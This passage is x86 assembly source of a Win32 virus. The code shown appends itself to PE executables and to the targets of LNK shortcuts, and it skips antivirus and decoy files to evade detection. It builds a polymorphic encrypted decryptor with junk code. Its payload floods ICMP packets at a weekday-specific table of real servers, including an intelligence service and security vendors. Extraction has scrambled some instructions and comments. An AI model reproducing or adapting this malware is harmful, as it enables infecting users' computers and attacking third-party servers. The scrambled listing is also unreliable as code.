lodsd ; Get Address Table RVA add eax, [ebp+MZAddy] ; convert to VA and save it mov dword ptr [ebp+ATableVA], eax lodsd ; Get Name Pointer Table RVA add eax, [ebp+MZAddy] ; make it VA and save it mov dword ptr [ebp+NTableVA], eax lodsd ; Get Ordinal Table RVA add eax, [ebp+MZAddy] ; guess what ? *g* mov dword ptr [ebp+OTableVA], eax mov esi, [ebp+NTableVA]

SearchNextApi1: push esi

; Get the Name Pointer Table Addy in esi

; Save Pointer Table

lodsd add eax, [ebp+MZAddy]

; make it VA

mov esi, eax mov edi, edx push ecx

; API Name in the Kernel Export API ; API we are looking for ; save the size

cld rep cmpsb pop ecx jz FoundApi1

; Clear direction Flag ; Compare it ; Are they equal ?

pop esi ; add esi, 4h ; inc word ptr [ebp+counter] cmp word ptr [ebp+counter], je NotFoundApi1 jmp SearchNextApi1 ; FoundApi1: pop esi

Get the Pointer Table Set Pointer to the next api 2000h test next API

; clear stack ( we don't want buffer overflows ; ok, we want them, but not here *bg* )

movzx eax, word ptr [ebp+counter] shl eax, 1h ; multiply eax with ; Make eax Point to ; Ordinal Table add eax, dword ptr [ebp+OTableVA] xor esi, esi ; clear esi xchg eax, esi ; make esi point to lodsw ; get Ordinal in AX shl eax, 2h ; eax * 4 add eax, dword ptr [ebp+ATableVA] mov esi, eax ; esi points to the lodsd ; eax = address RVA add eax, [ebp+MZAddy] ; Make it VA ret NotFoundApi1: xor eax, eax ret

2 the right entry inside the

the entry

address RVA

; Return with API-Addy in eax

; We didn't find the API we need :( ; We set EAX to 0 to show we have to ; return to the host..

; *************************************************************************** ; -------------------[ Execute the original Program ]-----------------------; ***************************************************************************

ExecuteHost:

; Here we execute the original program

lea edi, [ebp+curdir] ; we return to the original directory.. push edi call dword ptr [ebp+XSetCurrentDirectoryA] or ebp, ebp jz FirstGenHost

; if this is a virus of the first generation ; we can't return to a host, so we ; stop this with ExitProcess..

Error_ExecuteHost: mov eax, dword ptr [ebp+SEH_Save] push eax mov fs:[0], esp

mov eax,12345678h org $-4 retEIP dd 0h

; here we return to ; the old entry point ; of the infected file

add eax,12345678h org $-4 retBas dd 0h jmp eax

FirstGenHost: push 0h call ExitProcess

; Stop executing this stuff ( first Generation ; only )

OldEIP dd 0h OldBase dd 0h

; Old Entry Point ; Old Imagebase

NewEIP

; New Entry Point ( points to our virus.. )

dd 0h

; *************************************************************************** ; ----------------[ We try to find the Kernel Address ]---------------------; *************************************************************************** GetKernel:

; Here we try to retrieve the Kernel ; set search range mov byte ptr [ebp+K32Trys], 5h

GK1: cmp byte ptr [ebp+K32Trys], 00h jz NoKernel ; Did we pass our limit of 50 pages ? call CheckMZSign jnc CheckPE

; Has this Page a DOS EXE-Header ?

GK2: sub esi, 10000h ; Get the next page dec byte ptr [ebp+K32Trys] jmp GK1 ; Check it CheckPE: mov edi, [esi+3Ch] add edi, esi call CheckPESign jnc CheckDLL jmp GK2 CheckDLL: add edi, 16h mov bx, word ptr [edi] and bx, 0F000h cmp bx, 02000h jne GK2 KernelFound: sub edi, 16h xchg eax, edi xchg ebx, esi cld

; Let's check if we really found ; the Kernel32.dll PE-Header ; check for PE-Sign ; check for the DLL-Flag

; check for the Dll-Flag ; get characteristics ; we need just the Dll-Flag ; if it is no dll go on searching ; ; ; ;

we found the Kernel32.dll set edi to the PE - Header save PE address in eax save MZ address in ebx

ret NoKernel: stc ret

; if not found we don't set the carriage flag ; return if not found

K32Trys

db 5h

; Search-Range

; *************************************************************************** ; -----------------[ Infection of the current directory ]-------------------; ***************************************************************************

InfectCurDir:

; ; ; ;

Here we infect the files in the current directory we use the FindFirstFile - FindNextFile API's to scan all files for PE-Executables and LNK-Files.

lea esi, [ebp+filemask] call FindFirstFileProc inc eax jz EndInfectCurDir1 dec eax

; If there are no files, we return

InfectCurDirFile: ; filename in esi lea esi, [ebp+WFD_szFileName] call InfectFile ; Try to infect it ! cmp [ebp+InfCounter], 0h jna EndInfectCurDir2

; if we infected enough files ; we return

call FindNextFileProc test eax, eax jnz InfectCurDirFile EndInfectCurDir2:

; we close the search - Handle

push dword ptr [ebp+FindHandle] call dword ptr [ebp+XFindClose] EndInfectCurDir1: ret

; we just return

InfCounter db 0h

; ; ; ;

FindHandle dd 0h

; The handle for the FindFirstFile API

filemask

; we search for all files, not just exe files

db '*.*', 0

Counter for the number of files we infect at max in the current directory ( could take too long if we want to infect them all )

; these structures are nessecairy ; for the FindFileFirst - FindFileNext API's ; *************************************************************************** ; ---------------------[ Prepare infection of file ]-----------------------; ***************************************************************************

InfectFile:

cmp byte ptr [esi], '.' je NoInfection

; ; ; ; ;

Here we prepare to infect the file the filename is in [ebp+WFD_szFileName] we open it and check if it is something we are able to infect... esi points to the filename..

; check if we got .. or . ; if the file is smaller than ; 200 Bytes it will not get checked or ; infected !

cmp dword ptr [ebp+WFD_nFileSizeLow], 200d jbe NoInfection ; we also don't infect it if it is too big cmp dword ptr [ebp+WFD_nFileSizeHigh], 0 jne NoInfection call CheckFileName jc NoInfection

; check for AV-Files

; Get File-Attributes lea eax, [ebp+WFD_szFileName] push eax call dword ptr [ebp+XGetFileAttributesA] ; save them mov dword ptr [ebp+Attributes], eax inc eax jz NoInfection dec eax

; if we failed we don't infect

push 80h ; clean attributes lea eax, [ebp+WFD_szFileName] push eax call dword ptr [ebp+XSetFileAttributesA] or eax, eax ; if we fail, we don't open the file jz NoInfection ; if we have no access to set the attributes, ; we will surely not be allowed to change the file itself call OpenFile jc NoInfection

; open the file ; if we failed we don't infect..

mov esi, eax call CheckMZSign jc CheckLNK

; if it is an EXE file, we go on ; otherwise we test if it is a LNK

cmp word ptr [eax+3Ch], 0h je CheckLNK xor esi, esi mov esi, [eax+3Ch]

; get the start of the PE-Header

; if it lies outside the file we skip it cmp dword ptr [ebp+WFD_nFileSizeLow], esi jb Notagoodfile add esi, eax mov edi, esi call CheckPESign jc Notagoodfile

; check if it is an PE-Executable ; check infection mark --> DDoS

; if it is there the file is already infected.. cmp dword ptr [esi+4Ch], 'SoDD' jz Notagoodfile mov bx, word ptr [esi+16h]; get characteristics and bx, 0F000h ; we need just the Dll-Flag cmp bx, 02000h je Notagoodfile ; we will not infect dll-files mov and cmp jne

bx, word ptr [esi+16h]; get characteristics again bx, 00002h ; we check if it is no OBJ or something else.. bx, 00002h Notagoodfile

call InfectEXE

; ; ; ;

ok, infect it ! if there occoured an error while mapping the file again, we don't need to unmap & close it

jc NoInfection jmp Notagoodfile CheckLNK: ; check if we got an LNK-File mov esi, dword ptr [ebp+MapAddress] cmp word ptr [esi], 'L' ; check for sign jne UnMapFile ; if it is no LNK File we close it call InfectLNK Notagoodfile: call UnMapFile

; we store the file.. ; we restore the file-attributes

push dword ptr [ebp+Attributes] lea eax, [ebp+WFD_szFileName] push eax call dword ptr [ebp+XSetFileAttributesA] NoInfection: ret

; *************************************************************************** ; ------------------------[ Open and close Files ]--------------------------; *************************************************************************** OpenFile: xor eax,eax ; let's open the file push eax push eax push 3h push eax inc eax push eax push 80000000h or 40000000h push esi ; name of file call dword ptr [ebp+XCreateFileA] inc eax jz Closed dec eax

; if there is an error we don't infect the file ; now the handle is in eax ; we save it

mov dword ptr [ebp+FileHandle],eax ; if we map a file normal, we map it with the size ; in the Find32-Data ; otherwise it is in ecx mov ecx, dword ptr [ebp+WFD_nFileSizeLow] CreateMap: push ecx

; save the size

xor eax,eax ; we create a map of the file to push eax ; be able to edit it push ecx push eax push 00000004h push eax push dword ptr [ebp+FileHandle] call dword ptr [ebp+XCreateFileMappingA] mov dword ptr [ebp+MapHandle],eax pop ecx test eax, eax jz CloseFile

; get the size again.. ; if there is an error we close the file ; no infection today :(

xor eax,eax ; we map the file.. *bla* push ecx push eax push eax push 2h push dword ptr [ebp+MapHandle] call dword ptr [ebp+XMapViewOfFile] or eax,eax jz UnMapFile

; if there is an error, we unmap it ; eax contains the offset where ; our file is mapped.. *g*

mov dword ptr [ebp+MapAddress],eax ; Clear c-flag for successful opening clc ret UnMapFile:

; we successfully opened it ! ; ok, unmap it

call UnMapFile2 CloseFile:

; let's close it

push dword ptr [ebp+FileHandle] call [ebp+XCloseHandle] Closed: stc

; set carriage flag

ret UnMapFile2:

; we need to unmap it some times, to ; map it again with more space..

push dword ptr [ebp+MapAddress]

call dword ptr [ebp+XUnmapViewOfFile] push dword ptr [ebp+MapHandle] call dword ptr [ebp+XCloseHandle] ret

; *************************************************************************** ; -------------------------[ Infect an EXE-FILE ]---------------------------; *************************************************************************** InfectEXE:

; MapAddress contains the starting offset of the file ; we will not infect exe files, which are smaller than ; 40 Kb, this is for avoiding goat files. ; AV's use them to study viruses !

cmp dword ptr [ebp+WFD_nFileSizeLow] , 0A000h jb NoEXE mov ecx, [esi+3Ch]

; esi points to the PE-Header ; ecx contains file-alignment ; put size in eax

mov eax, dword ptr [ebp+WFD_nFileSizeLow] add eax, dword ptr [ebp+VirLen] call Align ; align it and save the new size mov dword ptr [ebp+NewSize], eax xchg ecx, eax pushad

; ; ; ; ;

save registers we close the file and map it again, but this time we will load it with some more space, so we can add our code *eg*

call UnMapFile2 popad call CreateMap

; we map it again with a bigger size ; if we got an error we return

jc NoEXE ; make esi point to the PE-Header again ; get offset mov esi, dword ptr [eax+3Ch] ; make it VA add esi, eax mov edi, esi ; edi = esi ; eax = number of sections movzx eax, word ptr [edi+06h] dec eax imul eax, eax, 28h ; multiply with size of section header add esi, eax ; make it VA add esi, 78h ; make it point to dir table ; esi points now to the dir-table mov edx, [edi+74h] shl edx, 3h add esi, edx

; get number of dir - entrys ; multiply with 8 ; make point to the last section ; get the Entry Point and save it ; we need it to be able to return

; to the original file mov eax, [edi+28h] mov dword ptr [ebp+OldEIP], eax ; get the imagebase, also needed to ; execute original file mov eax, [edi+34h] mov dword ptr [ebp+OldBase], eax mov edx, [esi+10h]

; size of raw data ; we will increase it later

mov ebx, edx add edx, [esi+14h]

; edx = Pointer to raw-data

push edx

; save it in stack

mov eax, ebx add eax, [esi+0Ch]

; make it VA ; this is our new EIP

mov [edi+28h], eax mov dword ptr [ebp+NewEIP], eax mov eax, [esi+10h] ; get size of Raw-data push eax add eax, dword ptr [ebp+VirLen] ; increase it mov ecx, [edi+3Ch] ; Align it call Align ; save it in the file as ; new size of rawdata and mov [esi+10h], eax pop add add mov

eax ; new Virtual size eax, dword ptr [ebp+VirLen] eax, Buffersize [esi+08h], eax

pop edx mov eax, [esi+10h] add eax, [esi+0Ch]

; New Size of Image ; save it in the file

mov [edi+50h], eax ; change section flags to make ; us have write & read access to it ; when the infected file is run ; we also set the code flag.. ;) or dword ptr [esi+24h], 0A0000020h ; we write our infection mark to the program, ; so we will not infect it twice ; --> DDoS mov dword ptr [edi+4Ch], 'SoDD' push edi ; save them push edx push 10d pop ecx call GetRand

; get random number ( we'll use the EAX value )

pop edi pop edx

; restore and xchange

mov word ptr [ebp+Key], ax push eax ; save it 2 times lea esi, [ebp+Virus] ; point to start of virus add edi, dword ptr [ebp+MapAddress] push edi ; save edi mov ecx, dword ptr [ebp+VirLen] ; get size of virus in ecx rep movsb ; append virus ! pop mov add mov

esi edi, esi esi, NoCrypt ecx, (CryptSize / 2)

pop edx push edi mov edi, esi EnCryptLoop: lodsw not ax inc dx xchg dl, dh xor ax, dx xchg al, ah stosw loop EnCryptLoop

pop add mov mov mov xor

esi esi, ecx, edi, edx, eax,

; decrypt the virus

; get key from stack ; save start

; decrypt with second layer

; let's start decrypting with the second layer ; skip the call ; mov size to ecx

05h FirstLSize esi dword ptr [ebp+CryptType] eax

XorEncrypt: ; we use a simple xor dec edx jnz NegEncrypt mov dl, byte ptr [ebp+PolyKey] @Xor: lodsb xor al, dl stosb loop @Xor jmp EndPolyCrypto NegEncrypt: dec edx jnz NotEncrypt @Neg: lodsb neg al stosb loop @Neg jmp End2LCrypto

NotEncrypt: dec edx jnz IncEncrypt @Not: lodsb not al stosb loop @Not jmp End2LCrypto

; not byte ptr [esi]

IncEncrypt: dec edx jnz DecEncrypt @Inc: lodsb dec al stosb loop @Inc jmp End2LCrypto

; inc byte ptr [esi]

DecEncrypt: lodsb inc al stosb loop DecEncrypt

; dec byte ptr [esi]

End2LCrypto: dec byte ptr [ebp+InfCounter] ; if we succesfully received the dll and the ; function, we create a checksum for the ; file ( needed for dll's and WinNT ) cmp [ebp+XCheckSumMappedFile], 0h je NoCRC lea esi, [ebp+CheckSum] push esi lea esi, [ebp+HeaderSum] push esi push dword ptr [ebp+NewSize] push dword ptr [ebp+MapAddress] call dword ptr [ebp+XCheckSumMappedFile] test eax, eax jz NoCRC

; if this failed we don't save ; the crc

mov eax, dword ptr [ebp+MapAddress] ; eax points to the dos-stub mov esi, [eax+3Ch] ; esi points to PE-Header add esi, eax ; save CRC in header mov eax, dword ptr [ebp+CheckSum] mov [esi+58h], eax NoCRC: ret NoEXE: stc ret

; let's return and close the infected file ; this will also write it to disk !

; *************************************************************************** ; ------------------------[ Infect an LNK-FILE ]----------------------------; ***************************************************************************

InfectLNK:

; ; ; ; ;

if we find a link file, we try to find the file it points to. If it is a EXE File we are able to infect, we do so this will not work with NT-LNK-Files, there we will receive only the Drive, where the file is located

; ok, if a LNK is bigger than 1 Meg, it is none ; we check .. ;) cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h ja NoLNK

mov mov xor add

esi, ecx, edx, esi,

; get the start addy in esi, and and the size dword ptr [ebp+MapAddress] dword ptr [ebp+WFD_nFileSizeLow] edx ecx ; we start checking at the end of the file ; for a valid filename in it

CheckLoop: cmp byte ptr [esi], 3ah jne LNKSearch inc edx cmp edx, 2d je PointsDetected LNKSearch: dec esi loop CheckLoop

; we detect a filename by the 2 dots ( 3ah = : ) ; in the Drive ; there are 2 times 2 dots, when checking from ; the end of the LNK, we need the 2.nd

; go on searching

; if we end here, we did not find the two dots.. :( NoLNK: ret PointsDetected:

cmp byte ptr [esi+1], 0h je NoLNK

; we found the drive ( two dots ... *g* ) ; esi points to them, now we need to check ; for the start of the name.. ; check if we got an entire path or just a ; single drive ( may happen in NT / 2k )

PointsDetected2: dec esi cmp byte ptr [esi], 0h je NameDetected loop PointsDetected2 jmp NoLNK NameDetected:

inc esi push esi

; ecx still takes care, that we don't ; search too far.. ; nothing found ? return.. ; ; ; ;

ok, esi points now to the name of the file so we try a FindFileFirst to get the information first, we save the information in the WIN32_FIND_DATA then we try to find the file.

; save it

lea esi, [ebp+WIN32_FIND_DATA]

lea edi, [ebp+Buffer] mov ecx, 337d rep movsb lea xor mov rep

; save the old WIN32_FIND_DATA ; and some more data

edi, [ebp+WIN32_FIND_DATA] eax, eax ; clean this field ecx, 337d stosb

pop esi call FindFirstFileProc inc eax jz RestoreLNK dec eax

; If there are no files, we return ; otherwise we save the handle ; ; ; ;

if we went here, we know the file exists esi still points to the filename including the directory, we save this in the win32_Find_DATA field, because the name there contains no path

lea edi, [ebp+WFD_szFileName] mov ecx, 259d ; we just move 259 Bytes, so there is still a ending ; Zero if the name is longer and we just get a simple error ; and not an SEH or some other shit rep movsb lea esi, [ebp+WFD_szFileName] call InfectFile ; esi points to the filename again, so we infect it ;) push dword ptr [ebp+LNKFindHandle] call dword ptr [ebp+XFindClose] RestoreLNK: lea edi, [ebp+WIN32_FIND_DATA] lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA mov ecx, 337d ; and some other data rep movsb ret LNKFindHandle dd 0h

; return to find more files ; here we save the search-handle

; *************************************************************************** ; ---------------------[ The evil Part: the Payload ]-----------------------; ***************************************************************************

PayLoad:

; here we handle the payload of the virus *eg*

cmp dword ptr [ebp+W32Handle],0 jne ExecuteHost cmp dword ptr [ebp+XCreateThread],0 je ExecuteHost ; we better check this, cause this api does not exist in 2k

lea eax, [ebp+SystemTime] ; retrieve current date, time,.. whatever push eax call dword ptr [ebp+XGetSystemTime]

lea esi, [ebp+wDayOfWeek] ; get the day xor eax, eax lodsw shl eax, 2h

; multiply with 4 ; get Target

lea esi, [ebp+TargetTable] add esi, eax lea edi, [ebp+Target_IP] ; write IP to Destination Address Field movsd ; we get a nice target for the payload ; and create a new thread to fulfill it ;) push push push push push push call

offset threadID ; here we save the thread ID 0h 0h offset PingFlood ; here starts the code of the new thread 0h 0h dword ptr [ebp+XCreateThread]

jmp ExecuteHost PingFlood:

; we're finished, so we execute the host-file ; this is the thread of the payload ! ; here are we doing the really evil thingies ;) ; we will start pinging a server ;P

lea eax, [ebp+offset WSA_DATA] push eax ; where is it.. push 0101h ; required version call dword ptr [ebp+XWSAStartup] push push push call

1 ; We want to use the icmp protocoll 3 ; SOCK_STREAM 2 ; Address Format dword ptr [ebp+Xsocket]

mov dword ptr [ebp+ICMP_Handle], eax push 4

; set the options ( timeout, not really ; nessecairy in this case *g* ) lea eax, [ebp+offset Timeout] push eax push 1006h push 0FFFFh push eax call dword ptr [ebp+Xsetsockopt] ; we need to create a checksum for the packet lea esi, [ebp+ICMP_Packet]; nothing serious just some additions push 6 pop ecx xor edx, edx CreateICMP_CRC: lodsw movzx eax, ax add edx, eax loop CreateICMP_CRC movzx eax, dx shr edx, 16d

; we do this for 6 words ; = 12 bytes

; load one ; mov it to eax ( clean upper part of eax ) ; add it to edx ( we just add them all )

; add the lower ( dx ) and the upper part of ; edx together in eax

add eax, edx movzx edx, ax shr eax, 16d add eax, edx

; save ax in edx ; mov upper part of eax to ax ( clean upper part ) ; add old ax to new ax ( add upper part to lower part )

not eax

; eax = - 1 * ( eax + 1 ) ; this is our checksum mov word ptr [ebp+ICMP_CRC], ax

push 16d ; get it out, we send our packet ! lea eax, [ebp+offset Info] push eax push 0 push 12d lea eax, [ebp+offset ICMP_Packet] push eax push dword ptr [ebp+ICMP_Handle] call dword ptr [ebp+Xsendto] CloseSocket: ; close the socket, to stay stable ;) push dword ptr [ebp+ICMP_Handle] call dword ptr [ebp+Xclosesocket] call dword ptr [ebp+XWSACleanup]

jmp PingFlood

; heh that was fun, let's do it again ;)

Timeout Info:

; 10000 ms Timeout ( we don't really care about it *g* )

dd 100000d

dw dw Target_IP db dd ICMP_Packet db db ICMP_CRC dw dd dd dd ICMP_Handle dd TargetTable:

db db db db db db db

62d, 195d, 216d, 216d, 194d, 208d, 205d,

2h 0h 0d, 0d, 0d, 0d 0h ; there we will fill in the target ip address ;) 8h 0h 0h ; for the CRC Calculation of the ping 0h 0h 0h 0h ; the handle of the open Socket ; ; ; ; ;

these are our targets please note again, that i don't want to damage one of these servers ! I choose them because I think that they will stand such an attack if anyone will ever release this into the wild !!!

156d, 146d, 231d ; Sunday 154d, 220d, 34d ; Monday 122d, 8d, 245d ; Tuesday 41d, 20d, 75d ; Wednesday 252d, 6d, 47d ; Thursday 226d, 167d, 23d ; Friday 178d, 21d, 3d ; Saturday

= = = = = = =

www.bundesnachrichtendienst.de French Secret Service ( dgse.citeweb.net ) www.avp.com ( AV ) www.lockdown2000.com www.f-secure.com www.norton.com www.zonelabs.com

; *************************************************************************** ; -------------------------[ Align-Procedure ]------------------------------; *************************************************************************** ; lets align the size..

; eax - size ; ecx - base Align: push edx xor edx, edx push eax div ecx pop eax sub ecx, edx add eax, ecx pop edx ret

; eax - new size

; *************************************************************************** ; --------------------------[ FindFile Procedures ]-------------------------; ***************************************************************************

FindFirstFileProc: lea eax, [ebp+WIN32_FIND_DATA] push eax push esi call dword ptr [ebp+XFindFirstFileA] mov dword ptr [ebp+FindHandle], eax ret FindNextFileProc: lea edi, [ebp+WFD_szFileName] mov ecx, 276d ; we clear these fields ! xor eax, eax rep stosb lea eax, [ebp+WIN32_FIND_DATA] push eax mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindNextFileA] ret CheckFileName: pushad lea esi, [ebp+WFD_szFileName] mov edi, esi mov ecx, 260d ConvertLoop: lodsb cmp al, 96d jb Convert cmp al, 123d ja Convert or al, al jz EndConvert sub al, 32d Convert: stosb loop ConvertLoop

; Convert to upper cases

EndConvert: lea edi, [ebp+WFD_szFileName] lea esi, [ebp+FileNames] mov ecx, 3h

FileNameCheck: push ecx mov ecx, 260d

; check for av-names ; i don't want to infect them

CheckON: lodsb repnz scasb or ecx, ecx jnz AVFile pop ecx inc esi loop FileNameCheck jmp EndFileNameCheck

AVFile: mov al, byte ptr [esi] cmp byte ptr [edi], al je GotAVFile

; check if the second char also matches

dec esi jmp CheckON GotAVFile: pop ecx popad stc ret

; clear stack ; set carriage flag

EndFileNameCheck: popad clc ret

FileNames db 'AV' db 'AN' db 'DR'

; we avoid these names ; so we will not infect an AV and ; alert the user

;**************************************************************************** ; ---------------------[ Checks for PE / MZ Signs ]-------------------------; *************************************************************************** ; we check here for PE and MZ signs ; to identify the Executable we want to infect ; I do this a little bit different than usual *g* CheckPESign: cmp dword ptr [edi], 'FP' ; check if greater or equal to PF jae NoPESign cmp dword ptr [edi], 'DP' ; check if lower or equal to PD jbe NoPESign clc ret NoPESign: stc ret CheckMZSign:

; all that's left is PE

; set carriage flag

cmp word ptr [esi], '[M' jae NoPESign cmp word ptr [esi], 'YM' jbe NoPESign clc ret ret ; *************************************************************************** ; ----------------[ Generate a pesudo-random Number ]-----------------------; *************************************************************************** GetRand: ; generate a pseudo-random NR. ; based on some initial registers ; and the Windows - Ontime

push ecx add ecx, eax call dword ptr [ebp+XGetTickCount] add eax, ecx add eax, ecx add eax, edx add eax, edi add eax, ebp add eax, dword ptr [ebp+PolyLen] add eax, dword ptr [ebp+LoopLen] sub eax, esi sub eax, ebx pop ecx add eax, ecx add al, byte ptr [ebp+Reg1] add ah, byte ptr [ebp+Reg2] or eax, eax jne GetOutRand mov eax, 87654321h inc eax GetOutRand: xor edx, edx div ecx

; clean edx ( needed to be able to divide later ) ; Random Numer is in EAX ; RND No. 'till ECX in EDX

ret ; *************************************************************************** ; ----------------------[ Generate a Poly Decryptor ]-----------------------; ***************************************************************************

genPoly: and dword ptr [ebp+PolyLen], 0h push 10h pop ecx call GetRand

; get a random number to start ; and save it as the new key used for all files

mov byte ptr [ebp+PolyKey], al

call GetRegs lea edi, [ebp+PDecrypt]

; here starts the decryptor

call RandJunk

push 2h pop ecx call GetRand

dec edx jz SecondOrder FirstOrder: call GenerateESI call RandJunk call GenerateECX jmp Polypreparefinished

; ; ; ;

we have 3 different ways to put the size in ecx and 3 different ways to get the starting offset in esi divide by 2

; ; ; ;

get a random number to decide what we do first we need these 2 values before we start the decryption loop !

; if edx = 1 we use the second one ; chose the Order

; esi comes first and ecx follows ; and 4 different ways to get size in exc ; so there is nothing static here !

SecondOrder: call GenerateECX call RandJunk call GenerateESI

; ecx comes first and esi follows

Polypreparefinished:

; ; ; ; ;

we finished the preparing and can start the loop we need a xor byte ptr [esi], key ( or other crypto ) inc esi / add esi, 1h loop Decryptor / dec ecx , jnz Above ..

; lenght of loop = 0 and dword ptr [ebp+LoopLen], 0 ; now we choose the way we crypt this thing ! push 5h pop ecx call GetRand mov dword ptr [ebp+CryptType], edx XorDecrypt: dec edx jnz NegDecrypt mov ax, 3680h stosw

; we use a simple XOR BYTE PTR [ESI], KEY

; xor byte ptr [esi]

mov al, byte ptr [ebp+PolyKey] stosb ; increase sizes ( we will add the last 2 bytes later ) add dword ptr [ebp+LoopLen], 1h add dword ptr [ebp+PolyLen], 1h jmp EndPolyCrypto NegDecrypt: dec edx jnz NotDecrypt mov ax, 1EF6h

; neg byte ptr [esi]

stosw jmp EndPolyCrypto NotDecrypt: dec edx jnz IncDecrypt mov ax, 16F6h stosw jmp EndPolyCrypto

; not byte ptr [esi]

IncDecrypt: dec edx jnz DecDecrypt mov ax, 06FEh stosw jmp EndPolyCrypto

; inc byte ptr [esi]

DecDecrypt: mov ax, 0EFEh stosw

; dec byte ptr [esi]

EndPolyCrypto: ; add the last 2 bytes add dword ptr [ebp+LoopLen], 2h add dword ptr [ebp+PolyLen], 2h call RandJunk

; more junk.. ;) ; now we need to increase esi ; to crypt the next byte

push 3h pop ecx call GetRand IncESI1: dec edx jnz IncESI2 mov al, 46h stosb

; do a simple inc esi

jmp EndIncESI IncESI2: dec edx jnz IncESI3

; add esi, 1h

mov al, 83h stosb mov ax, 01C6h stosw jmp EndIncESI2 IncESI3:

; clc, adc esi, 1h

mov eax, 01d683f8h stosd add dword ptr [ebp+LoopLen], 1h add dword ptr [ebp+PolyLen], 1h EndIncESI2:

add dword ptr [ebp+LoopLen], 2h add dword ptr [ebp+PolyLen], 2h EndIncESI: add dword ptr [ebp+LoopLen], 1h add dword ptr [ebp+PolyLen], 1h call RandJunk

; more, and more.. ; now esi is incremented and we just have to do ; the loop

push 3h pop ecx call GetRand LoopType1: dec edx jnz LoopType2

; we use the most common form : loop ;)

mov al, 0e2h stosb call StoreLoopLen jmp EndLoopType LoopType2: dec edx jnz LoopType3

; we do a dec ecx, jnz

mov ax, 7549h stosw ; correct Loop Size ( dec ecx = 1 byte ) add dword ptr [ebp+LoopLen], 1h call StoreLoopLen add dword ptr [ebp+PolyLen], 1h jmp EndLoopType LoopType3: mov eax, 0F98349h ; stosd add dword ptr [ebp+LoopLen], mov al, 75h ; stosb add dword ptr [ebp+PolyLen], call StoreLoopLen

dec ecx cmp ecx, 0h 4h jne 3h

EndLoopType: add dword ptr [ebp+PolyLen], 2h mov byte ptr [edi], 0C3h ; save the ending ret add dword ptr [ebp+PolyLen], 2h

mov eax, VirusSize ; calculate the new size for the virus add eax, dword ptr [ebp+PolyLen] mov dword ptr [ebp+VirLen], eax ret StoreLoopLen: xor eax, eax mov ax, 100h

; calculate the size for the loop

sub eax, dword ptr [ebp+LoopLen] sub eax, 2h stosb ret ; *************************************************************************** ; --------------------------[ Insert Junk Code ]---------------------------; *************************************************************************** RandJunk: ; edi points to the place where they will be stored ; we will insert 1-8 junk instructions push 7d ; each time this routine is called pop ecx call GetRand xchg ecx, edx inc ecx push ecx

RandJunkLoop: push ecx push 8h pop ecx call GetRand xchg eax, edx

; get a random number from 0 to 7

lea ebx, [ebp+OpcodeTable] xlat ; get the choosen opcode stosb ; and save it to edi xor eax, eax ; clean eax ; get first Register mov al, byte ptr [ebp+Reg1] shl eax, 3h ; multiply with 8 add eax, 0c0h ; add base ; add the second register add al, byte ptr [ebp+Reg2] stosb ; save opcode XchangeRegs: Call GetRegs mov al, byte mov ah, byte mov byte ptr mov byte ptr

; we get new ones and exchange them ; cause the rnd - generator relies on them *g* ptr [ebp+Reg1] ptr [ebp+Reg2] [ebp+Reg1], ah [ebp+Reg2], al

pop ecx loop RandJunkLoop

; restore ecx ; and loop

pop ecx shl ecx, 1

; we need the additional lenght ; multiply with 2 ; save it add dword ptr [ebp+LoopLen], ecx add dword ptr [ebp+PolyLen], ecx

ret OpcodeTable: db 08Bh db 033h db 00Bh

; mov ; xor ; or

db db db db db

02Bh 003h 023h 013h 01Bh

GetRegs:

; ; ; ; ;

sub add and adc sbb

; select two registers to use ; set to Error

pushad mov byte ptr [ebp+Reg1], -1 mov byte ptr [ebp+Reg2], -1 lea edi, [ebp+Reg1] mov ecx, 2 ; now we choose 2 registers we use NextReg: push ecx push 8h pop ecx call GetRand pop ecx cmp edx, 1h je NextReg cmp edx, 4h je NextReg cmp edx, 6h je NextReg mov al, dl stosb loop NextReg

; to make the junk code look realistic

; we will not use ECX ; ESP ; or ESI, cause these values are important ; for the decryptor or the virus to work. ; save it

popad ret ; *************************************************************************** ; -------------------------[ Get esi from stack ]---------------------------; *************************************************************************** GenerateESI: ; ; ; ; ; push 3h pop ecx call GetRand dec edx

the first thing we do is to get the start of the crypted code, this is simpel, it is our return address, so we get it from stack there are 3 different ways we can do this

; which way to we use ?

jnz ESI2 ESI1: lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction movsw ; 3 bytes long movsb add dword ptr [ebp+PolyLen], 3h jmp EndESI

; get back

ESI2: dec edx jnz ESI3

; we simply pop esi and push it again

mov al, 5eh ; pop esi stosb mov al, 56h stosb ; push esi add dword ptr [ebp+PolyLen],2h jmp EndESI

ESI3: push 5h pop ecx call GetRand xchg eax, edx cmp al, 1h jne ESI3b xor eax, eax ESI3b: mov edx, eax push edx add eax, 58h

; if we got ecx, we use eax

; save edx ; pop a register

stosb pop eax push eax add eax, 50h stosb

; push the value again

mov al, 08bh ; and finally move it to esi stosb pop eax mov al, 0f0h add al, dl stosb add dword ptr [ebp+PolyLen], 4h EndESI: ret

movESI db 8bh, 34h, 24h

; code to retrieve the start of crypt-code ; mov esi, [esp]

; *************************************************************************** ; --------------------------[ Move the size to ECX ]------------------------; *************************************************************************** GenerateECX:

push 3h pop ecx call GetRand inc edx ECX1: dec edx jnz ECX2

; here we put the size of the crypted ; part in ecx

; random Nr in edx ; increase ; use a simple mov

mov al, 0b9h call StoreALValue

; mov

jmp EndECX ECX2: dec edx jnz ECX3 mov al, 068h call StoreALValue

; let's use a push ( value ) ; pop ecx

; push

mov al, 59h ; save the pop ecx stosb add dword ptr [ebp+PolyLen], 1h jmp EndECX ECX3: push -1 pop ecx call GetRand mov eax, VirusSize shl edx, 26d shr edx, 26d sub eax, edx push eax mov al, 0b9h stosb pop eax stosb call StoShrEAX

; mov ecx, Size - X

mov ax, 0c181h stosw xor eax, eax mov al, dl

; add ecx, X

; and the size we need to decrypt

stosb call StoShrEAX add dword ptr [ebp+PolyLen], 11d jmp EndECX

StoreECX: push ax

; finish

; save the mov ; save the register

mov al, 0b8h add al, dl call StoreALValue

; save the mov reg, size

mov al, 03h stosb pop ax add al, 0c8h stosb

; add ecx, reg ; get the chosen register

add dword ptr [ebp+PolyLen], 4h EndECX:

; let's return

ret

StoShrEAX: push 3 pop ecx StoShrEAXLoop: shr eax, 8 stosb loop StoShrEAXLoop ret

; to save dwords backwards

StoreALValue: stosb mov eax, FirstLSize stosb call StoShrEAX

; we store the instruction in al ; and the size we need to decrypt ; eax, size

